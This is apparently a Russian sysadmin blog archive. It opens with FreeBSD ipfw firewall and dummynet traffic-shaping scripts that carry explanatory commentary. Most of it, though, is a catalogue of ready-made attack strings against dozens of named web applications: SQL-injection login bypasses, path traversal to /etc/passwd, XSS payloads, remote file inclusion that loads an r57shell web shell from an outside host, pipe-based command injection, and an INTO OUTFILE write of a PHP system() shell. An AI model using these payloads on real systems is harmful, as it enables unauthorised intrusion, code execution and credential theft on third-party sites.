${fwcmd} add ${num}999 skipto 65000 all from any to any


f_tun0

#!/bin/sh

iface="tun0"

#Isolate traffic via "${iface}" for decrease number of passing via firewall rules
${fwcmd} add 9999 skipto ${num}000 all from any to any via "${iface}"

#DENY all unwanted traffic
${fwcmd} add ${num}103 deny all from 10.0.0.0/8 to any out xmit "${iface}"
${fwcmd} add ${num}103 deny all from 192.168.0.0/16 to any in recv "${iface}"
${fwcmd} add ${num}103 deny all from 10.0.0.0/8 to any in recv "${iface}"
${fwcmd} add ${num}103 deny all from 172.16.0.0/16 to any in recv "${iface}"

#Put out traffic into pipe
#Обратите внимание на тот факт, что пакет выходи с очереди и пападает в правило
#СО СЛЕДУЮЩИМ НОМЕРОМ, не в сделующее правило!
#Так пакет выйдя с очереди 22 попадёт сразу в правило хх803
${fwcmd} add ${num}403 queue 21 all from 192.168.1.0/24 to any out xmit "${iface}"
${fwcmd} add ${num}403 queue 27 all from any to 192.168.0.0/16 in recv "${iface}"

${fwcmd} add ${num}803 queue 26 all from any to 192.168.1.0/24 in recv "${iface}"
${fwcmd} add ${num}803 queue 27 all from any to 192.168.0.0/16 in recv "${iface}"

#ALLOW rules
#К примеру у Вас маршрут по умолчанию через tun0 интерфейс
#Но также есть выход в и-нет через интерфейс rl0. Тут мы форвардим на шлюз
#провайдера (G.A.T.E) трафик который уходит с реального IP интерфейса rl0 I.N.E.T
#Обратите внимание что пакет сразу уйдет на шлюз провайдера через rl0 и не будет проходить файр вол ещё раз
${fwcmd} add ${num}901 fwd G.A.T.E all from I.N.E.T to any via "${iface}"

#просто разрешаем весь трафик через интерфейс, тк. на tun0 IP динамический
#Это правило - дыра в файрволе!! Т.к. любой может указать нашу машину шлюзом и отправлять трафик в и-нет
#Поэтому мы всё не нужно отсекли в секции хх100-хх199
#Однако на 100% быть уверенным нельзя, что закрыли всё ненужное. Вот поэтому делать РАЗРЕШЕНО ПО УМОЛЧАНИЮ не стоит!
${fwcmd} add ${num}902 allow all from any to any out xmit "${iface}"

#Deny all other traffic
${fwcmd} add ${num}998 deny log all from any to any via "${iface}"
${fwcmd} add ${num}999 skipto 65000 all from any to any


Файл пайпов и очередей
f-pipes.ipfw
#!/bin/sh

${fwcmd} pipe 1 config bw 8Kbytes queue 15 mask src-ip 0xffffffff gred 0.002/10/30/0.1#in
${fwcmd} pipe 2 config bw 8Kbytes queue 15 mask dst-ip 0xffffffff gred 0.002/10/30/0.1#out

${fwcmd} pipe 3 config bw 16Kbytes queue 25 mask src-ip 0xffffffff gred 0.002/10/30/0.1#in
${fwcmd} pipe 4 config bw 16Kbytes queue 25 mask dst-ip 0xffffffff gred 0.002/10/30/0.1#out
${fwcmd} pipe 5 config bw 32Kbytes queue 50 mask src-ip 0xffffffff gred 0.002/10/30/0.1#in
${fwcmd} pipe 6 config bw 32Kbytes queue 50 mask dst-ip 0xffffffff gred 0.002/10/30/0.1#out

${fwcmd} pipe 7 config bw 4096Kbits #in
${fwcmd} pipe 8 config bw 1024Kbits #out
#Так как две очереди имеют разный приоритет, то трафик с очереди 21 начнет обрабатываться только после очереди 22
#Если же 22 будет загружать канал на 100%, то трафик с очереди 21 никогда не обработается
${fwcmd} queue 21 config pipe 8 weight 1 mask src-ip 0xffffffff gred 0.002/10/30/0.1
${fwcmd} queue 22 config pipe 8 weight 50 mask src-ip 0xffffffff gred 0.002/10/30/0.1

${fwcmd} queue 26 config pipe 7 weight 1 mask dst-ip 0xffffffff gred 0.002/10/30/0.1
${fwcmd} queue 27 config pipe 7 weight 50 mask dst-ip 0xffffffff gred 0.002/10/30/0.1

${fwcmd} pipe 9 config bw 2312Kbits #Out
${fwcmd} pipe 10 config bw 2312Kbits #In
${fwcmd} pipe 11 config bw 256Kbits #Out
${fwcmd} pipe 12 config bw 256Kbits #In

${fwcmd} queue 31 config pipe 9 mask dst-ip 0xffffffff gred 0.002/10/30/0.1
${fwcmd} queue 32 config pipe 11 mask dst-ip 0xffffffff gred 0.002/10/30/0.1
${fwcmd} queue 33 config pipe 10 mask src-ip 0xffffffff gred 0.002/10/30/0.1
${fwcmd} queue 34 config pipe 12 mask src-ip 0xffffffff gred 0.002/10/30/0.1


Неслько слов о порядке обработки пакетов
* Пакеты обрабатываются в порядке их поступления и с максимально
возможной скоростью.
* Пакеты, которые не могут быть отправлены/обработаны в данный момент
ложатся в буфер. По умолчанию queue 50, т.е. 50 пакетов
максимальной длины 1500 байт.
* Если пакет попал в пайп, то он отправляется со скоростью указанной
для пайпа
* Если необходимо чтобы пакеты от разных источников отправлялись
поочерёдно (roundrobin), то нужно чтобы пакеты с нескольких
очередей попадали в один пайп(очередь?) и вес этих очередей должен
быть одинаков. Иначе
* очередь с меньшим весом будет обрабатываться только тогда, когда в
очереди с большим весом не будет пакетов.

ipfw pipe 1 config bw 512Kbits
ipfw add queue 1 config pipe 1 weight 10
ipfw add queue 2 config pipe 1 weight 10
ipfw add queue 3 config pipe 1 weight 10


В этом примере пакеты будут выбираться по одному с каждой очереди по
порядочку:
* пакет с очереди 1
* пакет с очереди 2
* пакет с очереди 3
* пакет с очереди 1
* пакет с очереди 2
* пакет с очереди 3
* и тд.

Если в данный момент есть трафик только на одной очереди, то пакеты с
этой очереди будут выбиратся со скоростью в 512Кбит.
Однако если две очереди загружены по максимуму, то каждая получит
256Кбит.

Если же работают все 3 очереди, одна на 128Кбит, а остальные две
пытаются загрузить по максимуму, то эти две получат по (512-128)/2 =
192Кбита

Для того чтобы не создавать кучу очередей, можно использовать маску. По
умолчанию она равна 0х00000000 и дополнительные очереди не создаются.
Если же задать mask src-ip 0xffffffff, то для каждого нового источника
(IP) будет создана новая очередь. Или же mask src-ip 0xffffff00 то для
каждой подсети /24 будет создана новая очередь. Например:

пакеты у которых источник 192.168.0.5, 192.168.0.17, 192.168.0.33
попадут в одну очередь (общая часть 192.168.0) а пакеты у которых
источник 192.168.1.7, 192.168.1.15 попадут в другую (другая о бщая часть
192.168.7, поэтому другая очередь) даже для пакетов у которых источник
10.0.7.1, 10.0.7.3 также попадут в свою очередь (общая часть 10.0.7)

Таким образом 0 задаёт ту часть адреса, которая будет игнорироваться
при создании новой очереди. Одним словом маска =)

Рассмотрим очень простой пример:
ipfw pipe 1 config bw 512Kbits mask src-ip 0xffffff00
ipfw add queue 1 config pipe 1 mask src-ip 0xffffffff
ipfw add 1 queue 1 all from any to any out xmit rl0 #шейпится на выходе к провайдеру


Все пакеты будут обрабатываться в порядке roundrobin и для каждой
подсети 255.255.255.0 будет выделен канал 512Кбит

f-count.ipfw
#!/bin/sh

#считаем наш трафик к/от провайдера
ipfw add 103 count all from any to any in recv rl0
ipfw add 104 count all from any to any out xmit rl0

#обычно на интерфейсе может шнырять всякая лабуда типа router discovery, DHCP, б
роадкасты, поэтому лучше считайте только свой трафик
ipfw add 105 count all from any to I.N.E.T in recv rl0 #Входящий на ваш IP
ipfw add 106 count all from I.N.E.T to any out xmit rl0 #Исходящий с вашего IP


Обратите внимание num= "00" (строка 27 в firewall)

f-defaults.ipfw
#!/bin/sh

#Блокируем трафик с локальной сети в интернет
${fwcmd} add ${num}901 deny ip from 10.0.0.0/8 to any via tun0

ipfw vs pf


Недостаток ALTQ

Я бы не использовал ALTQ в качестве шейпера только по одной причине:
шейпится только исходящий трафик. Это самый большой минус, который
можно придумать! Этот минус сводит на нет все достоинства ALTQ. Почти
везде можно увидить:

MB> потому что шейпить входящий трафик дурость =)
На самом деле дурость - это НЕ ШЕЙПИТЬ входящий трафик!!!
Простой пример. хост -- роутер -- шлюз -- инет

Если пользователь ХОСТ и РОУТЕР будут качать, то НЕВОЗМОЖНО создать
правило, которое будет обрабатывать пакеты предназначенные для ХОСТ и
РОУТЕР поочерёдно (roundrobin). Т.е. НЕВОЗОМЖНО разделить канал от ШЛЮЗ
к РОУТЕР на равные части между пользователем ХОСТ и РОУТЕР
ПОЧЕМУ?

Потому что для РОУТЕР исхода не будет (пакет когда попадёт в ядро сразу
передастся приложению) и поэтому мы не сможем пропустить этот пакет
через ALTQ.

Поэтому пользователь РОУТЕР может загрузить канал в ущерб для ХОСТ.
Некоторые могут возразить что мол мы не можем контролировать входящий
поток.

Я отвечу что можем! Наверное Вы просто ребята не читали работу
протокола TCP/IP.

То что не получится для входящего трафика, так это приоритезировать его
по типам. Например www дать меньше приоритета, чем голосовому трафику.
Тут уж как пришли к нам пакеты, так уж пришли.

То что можно сделать, так это перенаправлять входящий трафик клиентам
по очереди, таким образом разделив канал поровну между ними. Также
можно ограничить потребление некоторым клиентом не более K% трафика.
Что касается тупого флуда на Ваш интерфейс, то тут действительно кроме
удара в голову флудеру ничего не поможет,
Но это частный случай!

Что не нужно делать

1. Берите люди интернет кто хотите:
ipfw add 1 divert natd all from any to any
ipfw add 2 allow all from any to any


2.Не ложите в один пайп входящий и исходящий трафик. Возьмите за
правило: одно направление трафика - один пайп
К примеру если создать пайп на 115200bit и положить в него вход и
исход, то получится канал как на Sirius. Кто работал через этот модем,
тот уже представил какая лажа будет :-D

3. Если у Вас есть пайп на направление, то не пропускайте трафик мимо
этого пайпа Т.к. некоторые алгоритмы шейпинга будут работать неверно
(например RED) если реальная скорость канала (pipe) будет отличаться
сконфигурированной. Например у нас на интерфейсе подключение 256Кбит и
мы создали канал на 256Кбит и направили весть трафик в этот канал.
Трафик отлично подрежится и будет бегать с задданой скоростью.
Но в ситуации если вдруг Вы решили пустить трафик от какого-то хоста
мимо пайпа, ничего работать не будет. Давайте посмотрим что произойдет,
если этот хост загрузит канал на 128Кбит, а весь остальной трафик,
который попадает в пайп, будет идти пытаться со скоростью 192Кбит. В
итоге получим, что в канале пиковое значение 256Кбит достигнуто не
будет и следовательно он не будет шейпится, а на выходе возникнут
потери, т.к. наш интерфейс способен обработать только 256Кбит, а не
128+192=320Кбит!!!
Рубрики:  FreeBSD

Другие инструменты

Воскресенье, 26 Июня 2011 г. 16:46 + в цитатник
Другие инструменты



Digital Scribe 1.4 SQL Injection

login.php POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login

ATUTOR 1.5.1 SQL Injection

password_reminder.php POST form_password_reminder=true&form_email=%27

PHP Advanced Transfer Manager System локальный include

viewers/txt.php?filename=../../../../../../../../../../boot.ini%00

viewers/txt.php?filename=../../../../../../../../../../etc/passwd%00


Chipmunk Topsites XSS

recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E

Chipmunk Directory XSS

recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E

Gcards 1.44 limit parameter SQL Injection

news.php ?limit=force_sql_error

phpSysInfo 2.3 XSS

index.php ?VERSION=%22%3E%3Cscript%3Ealert('FORCE_XSS')%3C/script%3E

Advanced Poll 2.03 XSS

popup.php ?poll_ident=%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E

PHPGreetz 0.99 Remote File Include

content.php?content=http://rst.void.ru/download/r57shell.txt

eFiction 1.1 XSS и SQL Injection

titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors%20/*

Google API Search Engine v.1.3.1 XSS

index.php?REQ=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmit=Submit

phpArcadeScript v.2.0 XSS

/includes/tellafriend.php?about=game&gamename=%3Cscript%3Ealert(${random});%3C/script%3E
Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Development Tools

Воскресенье, 26 Июня 2011 г. 16:42 + в цитатник
Development Tools



Mantis 1.00 File Inclusion

bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd%00

bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../../boot.ini%00


Flyspray 0.9.8 XSS

index.php ?tasks=all%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3 C%2Fscript%3E%26project%3D0

Gemini v.2.0 XSS

/issue/createissue.aspx?rtcDescription$RadEditor1=1><script>alert(${random});</script>


Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Электронная коммерция

Воскресенье, 26 Июня 2011 г. 16:36 + в цитатник
Электронная коммерция



Zend Cart 1.2.6 SQL Injection

admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0

+INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend


Lizard Cart CMS v.1.0.4 SQL Injection

detail.php?id=-1'

My Amazon Store Manager v1.0 XSS

/search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel

CRE Loaded v.6.15 XSS

/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/

script%3E&Mode=apparel


NZ Ecommerce SQL Injection

/index.php?action=Information&informationID=1%20and%20generate_error=error



Guest Book Applications



Ades Guestbook v.2.0 XSS

read.php ?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3

C%2Fscript%3E



Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Script Collections

Воскресенье, 26 Июня 2011 г. 16:35 + в цитатник
Script Collections



Codegrrl Arbitrary Local File Inclusion

protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd%00

protection.php?action=logout&siteurl=../../../../../../../../../../boot.ini%00


Techno Dreams Products SQL Injection

admin/login.asp POST userid=%27union+all+select+%271%27%2C%271%27+from+ admin+where+%27%27%3D%27&passwd=1&submit=Login

AlstraSoft Template Seller Pro 3.25 File Inclusion

include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box

AlstraSoft Affiliate Network Pro v.7.2 SQL Injection

admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F*&passwd=&B1=Login

OpenEdit v.4.0 XSS

/store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E


Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Gallery Applications

Воскресенье, 26 Июня 2011 г. 16:33 + в цитатник
Gallery Applications



Gallery "g2_itemId" локальный иклуид

main.php?g2_itemId=/../../../../../../../../../../../boot.ini%00

main.php?g2_itemId=/../../../../../../../../../../../etc/passwd%00

/upgrade/index.php ?stepOrder[]=../../../../../../../../include_inexistent_file.txt%00


Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию

relocate_server.php POST continue=1

Instant Photo Gallery v.1.0 SQL Injection

portfolio.php?cat_id="force_sql_error

Enhanced Simple PHP Gallery v.1.7 Раскрытие пути

index.php?dir=inexistent_directory

WhiteAlbum v.2.5 SQL Injection

pictures.php?dir=force_mysql_warning

LinPHA v.1.0 Local File Inclusion

/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00

/docs/index.php?lang=/../../../../../../../../../../boot.ini%00



Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

CMS Systems

Воскресенье, 26 Июня 2011 г. 16:32 + в цитатник
CMS Systems



PHP-Fusion 6.00.109 SQL Injection

faq.php?cat_id=1%27%20or%20force_mysql_error%3D%27 2

MySource 2.14.0 File Inclusion

init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt

e107 v0617 SQL Injection

e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&usubmit=Continue

lucidCMS 1.0.11 SQL Injection

index.php?command=panel

PhpWebThings 1.4.4 SQL Injection

forum.php?forum=-1%20union%20select%20password,password,null,null%2 0from%

20test_mysql_injection%20where%20uid=1/*


Envolution v.1.1.0 SQL Injection

modules.php?op=modload&name=News&file=index&catid=%221%22%20AND%20force_error=error

Acidcat v.2.1.13 SQL Injection

default.asp?ID=26%20union%20select%201,2,2,3,passw ord,5,6%20from%20Configuration

DEV v1.5 SQL Injection

index.php?session=0&action=openforum&cat=force_error

SiteEnable v.3.3 XSS

login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22

PortalApp v.3.3 XSS

login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22

Typo3 v.3.8.1 Раскрытие пути

/tslib/showpic.php

RunCMS v.1.3a5 XSS

/modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');

%3C/script%3E%3Cbr%20name=%22nothing


Mambo v.4.5.3h SQL Injection

/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypassword&option=login&Submit=Login&op2=login&lang

=english&return=${file}&message=0


Dragonfly CMS v.9.0.6.1 XSS

/index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat

=0&news_search_comments=0&coppermine=


Nodez v.4.6.1.1 XSS

/index.php?node=system&op=block%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)

%3C/script%3E&block=3&bop=more


XOOPS v.2.0.11 SQL Injection

/xmlrpc.php POST <?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value>

<string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>



Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Administration Tools

Воскресенье, 26 Июня 2011 г. 16:26 + в цитатник
Administration Tools



phpMyAdmin grab_globals.lib.php

libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../

../../../etc/passwd&subform[1]

libraries/grab_globals.lib.php POST

usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../

../../../boot.ini&subform[1]


phpMyAdmin XSS

queryframe.php?lang=en-iso-8859-1&server=1&hash=">='%3C/a%3E%3CIFRAME%

20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E


phpMyAdmin Раскрытие пути

libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&

allow_recoding=true)



Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Web Portals

Воскресенье, 26 Июня 2011 г. 16:07 + в цитатник
Web Portals



PHPNuke 7.8 Remote Directory Traversal

modules.php?name=Search&file=../../../../../../../../../../etc/passwd%00

modules.php?name=Search&file=../../../../../../../../../../../boot.ini%00




Партнерские системы



TWiki rev Parameter Remote Command Execution Vulnerability

view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd

view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cboot%2Eini


PmWiki 2.0.12 q-Parameter XSS

pmwiki.php ?n=Site.Search?action=search&q=test_search_item%27%20onMouseOver%3D%27alert%28% 22wvs-xss-magic

-string-${random}%22%29%3B%27%20



ProjectApp v.3.3 XSS

default.asp ?skin_number=XSS.css%22%3E%3Cscript%3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C

IntranetApp v.3.3 XSS

login.asp ?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22

dotproject v.2.0.1 File Inclusion

includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt

Qwiki v.1.5.1 XSS

index.php?page=Home&from='%3Cscript%3Ealert(%22xss-${random}%22)%3C/script%3E


Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Faq Systems

Воскресенье, 26 Июня 2011 г. 16:00 + в цитатник
Faq Systems

phpMyFAQ 1.5.1 SQL Injection
admin/password.php POST username=%27+or+isnull%281%2F0%29+%2F*&email=1@2.com
A-FAQ 1.0 SQL Injection
faqDsp.asp?catcode=12%20union%20select%20name%20fr om%20msysobjects%20in%20'\nopath\
sqlerr

Atlantis Knowledge Base Software v.3.0 SQL Injection
search.php POST searchStr=%25%27+union+select+*+from+force_mysql_w arning%2F*
ASP Survey v1.10 SQL Injection
/Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&Dest=http%3A%2F%2Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
FDefault.asp

Owl v.0.82 File Inclusion
/lib/OWL_API.php?xrms_file_root=nonexistent_test_includ efile%00

Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Блоки новостей

Воскресенье, 26 Июня 2011 г. 15:55 + в цитатник
Блоки новостей



myBloggie 2.1.3 SQL Injection

login.php POST username=%27+or+isnull%281%2F0%29+%2F*&passwd=&submit=Log+In

Simplog 0.9.1 SQL Injection

archive.php?blogid=force_error_for_test_reason

Zomplog 3.4 XSS

get.php?username=%3Cbr%3E%3Cb%3Exss%3C/b%3E%3Cbr%3E

CuteNews 1.4.1 Shell Injection

show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22test%22)

;%20die;?%3E.%22%20HTTP/1.0\r\n

Cute News 1.4.1 Local File Inclusion

show_archives.php?template=../../../../../../../../../../etc/passwd%00

show_archives.php?template=../../../../../../../../../../boot.ini%00


SimpleBlog v.2.1 SQL Injection

default.asp ?view=archives&month=%22generate_error&year=2004

Bit5blog v.8.1 SQL Injection

admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2F*&password=%27+or+isnull%281%2F0%29%2F*

WebspotBlogging v.3.0 SQL Injection

login.php POST username=%27+or+isnull%281%2F0%29%2F*&password=anypassword

e-moBLOG v.1.3 SQL Injection

/admin/index.php POST login=aaa%27+union+select+%27bbb%27%2C+%27161da2fa 81d32d4071ee16f7f77cb463%27%2F*&password=

any_password


miniBloggie v.1.0 SQL Injection

login.php POST user=%27+or+isnull%281%2F0%29%2F*&pwd=%27+or+isnull%281%2F0%29%2F*&submit=Log+In

Text Rider v.2.4 Список пользователей

/data/userlist.txt

AndoNET Blog SQL Injection

index.php?ando=comentarios&entrada=1'generate%20error

Loudblog v.0.4 PHP Code Injection

/loudblog/inc/backend_settings.php?GLOBALS[path]= http://rst.void.ru/download/r57shell.txt

PluggedOut Blog v.1.9.9c SQL Injection

exec.php?action=comment_add&entryid=force_error

Clever Copy v.3.0 SQL Injection

mailarticle.php?ID='UNION%20SELECT%200,0,0,0,0,0,u sername,password,0,0,0,0,0,0,0,0,0

%20FROM%20CC_admin/*


Magic News Lite v.1.2.3 Code Injection

preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt

WordPress v.2.0.1 Раскрытие пути

/wp-includes/default-filters.php

sBlog v.0.7.2 XSS

search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E

Maian Weblog v.2.0 SQL Injection

print.php?cmd=log&entry=1'%20or%20generate_error=2
Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Календари и Планировщики

Воскресенье, 26 Июня 2011 г. 15:48 + в цитатник
Календари и Планировщики



phpCommunityCalendar v.4.0.3 Обход Логина

webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+%2F*&Password=&Returned=1

Calendarix v.1.6 SQL Injection

cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*&password=any

Teca Diary Personal Edition v.1.0 SQL Injection

index.php?mm='%20force_sql_error&yy=2006

CALimba v.0.99.2 Sql Injection

index.php POST ute_login=%27%29+or+isnull%281%2F0%29%2F*&ute_password=anypassword&cmdOK=Login%21

Maian Events v.1.00 SQL Injection

menu.php?month='forceerror'


Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Network tools

Воскресенье, 26 Июня 2011 г. 15:40 + в цитатник
Network tools



phpLDAPadmin 0.9.6 Выполнение php кода

welcome.php ?custom_welcome_page= http://rst.void.ru/download/r57shell.txt

Netquery [host] Произвольное выполнение команд

nquser.php POST

1) querytype=dig&host=a%27%7Ccat%20%27%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17

2) querytype=dig&host=%7Ccat%20%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17



Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

PHP Библиотеки

Воскресенье, 26 Июня 2011 г. 15:35 + в цитатник
PHP Библиотеки



PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke

Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )

xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php


POST <?xmlversion="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>','')); printf(md5(acunetix_wvs_security_test)); exit;//</name></value></param></params></methodCall>

ADOdb

1) SQL Injection

/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'

2) Выполнение функции php

/tests/tmssql.php?do=phpinfo


Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

форумы

Воскресенье, 26 Июня 2011 г. 15:23 + в цитатник
Форумы



phpBB v.2.0.15 Выполнение php кода в viewtopic.php

viewtopic.php?t=1&highlight='.printf(md5(test)).'

PBLang 4.65 Локальный include файлов

setcookie.php?u=../../../../../../../../../../etc/passwd%00

setcookie.php??u=../../../../../../../../../../boot.ini%00


PHPTB v.2.0 Include файлов

/classes/admin_o.php?absolutepath= [forbidden link]

MailGust v.1.9 SQL Injection

post запрос index.php

method=remind_password&list=maillistuser&fromlist=maillist&frommethod=showhtmllist&email=1%27%

20union%20select%20%2A%20from%20force_sql_error%2F %2A%40hotmail%2Ecom&submit=Ok&showAvatar


Chipmunk Forum XSS

newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )

%3E%3C/IFRAME%3E


oaboard v.1.0 SQL Injection

forum.php?channel=0%20union%20select%20*%20from%20 force_mysql_table_error

Phorum 5.0.20 SQL Injection

search.php?1,search=%20,page=1,match_type=ALL,matc h_dates=30,match_forum=ALL,body=

1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error


Cyphor 0.19 XSS

/include/footer.php?t_login=%3Cscript%3Ealert(%22XSS%22)%3C /script%3E

W-Agora 4.2.0 XSS

/templates/admin/login_form.php?msg_login=%3Cscript%3Ealert(%22XSS% 22)%3C/script%3E

WizForum 1.20 SQL Injection

ForumTopicDetails.php?TopicID=11111111%20union%20S elect%20*%20from%20EronatedInex

istentTable


EkinBoard 1.0.3 SQL Injection

admin/index.php ?page=general&step=2

Cookie: username=%27or+isnull%281%2F0%29+AND+level%3D3%2F% 2A; password=

Snitz Forums 2000 v.3.4.05 XSS

post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&type=xss-${random}

PHP-Post 1.0 XSS

profile.php ?user='%3CIFRAME%20SRC=javascript:alert(%2527xss-${random}%2527)%3E%3

C/IFRAME%3E


WSN Forum 1.21 SQL Injection

memberlist.php ?action=profile&id=1'%20select%20*%20from%20force_mysql_warning

sCssBoard 1.12 XSS

index.php ?act=search-results

post search_term=%3Cscript%3Ealert%28%27wvs-${random}%27%29%3C%2Fscript%3E+&sortby=relevancy


freeForum 1.1 SQL Injection

forum.php?mode=thread&thread=force_mysql_fetch_object_warning

Orca Forum 4.3.b SQL Injection

forum.php ?msg=2'force_mysql_num_rows_warning

Pearl Forums 2.4 SQL Injection

index.php ?mode=forums&forumId=1%20union%20select%20*%20from%20force_erro r

SimpleBBS v.1.1 Выполнение php кода

index.php ?v=newtopic&c=1

POST name=<?php echo md5("test");?>&subject=mysubject&message=mymessage&sendTopic=Send


ADP Forum v.2.0.2 Информация о пользователя

/users/

ADN Forum v.1.0b SQL Injection

verpag.php?pagid=999'%20and_force_mysql_error/*

MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы

search.php?s=de1aaf9b&action=do_search&keywords=a&srchtype=3

MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта

/modules/logon.mod.php

Pentacle In-Out Board v.6.03.0.0080 SQL Injection

login.asp POST username=anypassword&userpassword=%27+or+%271%27%3D%271&Submit=Log+in

Battleaxe Software Forums v.2.0 XSS

failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext


Рубрики:  ITSecurity/Энциклопедия уязвимых скриптов
Уязвимости CMS/Forums/Guestbooks

Дневник r00t_666

Суббота, 04 Июня 2011 г. 10:19 + в цитатник
Блог сис.админа о сис администрироваании


Поиск сообщений в r00t_666
Страницы: [1] Календарь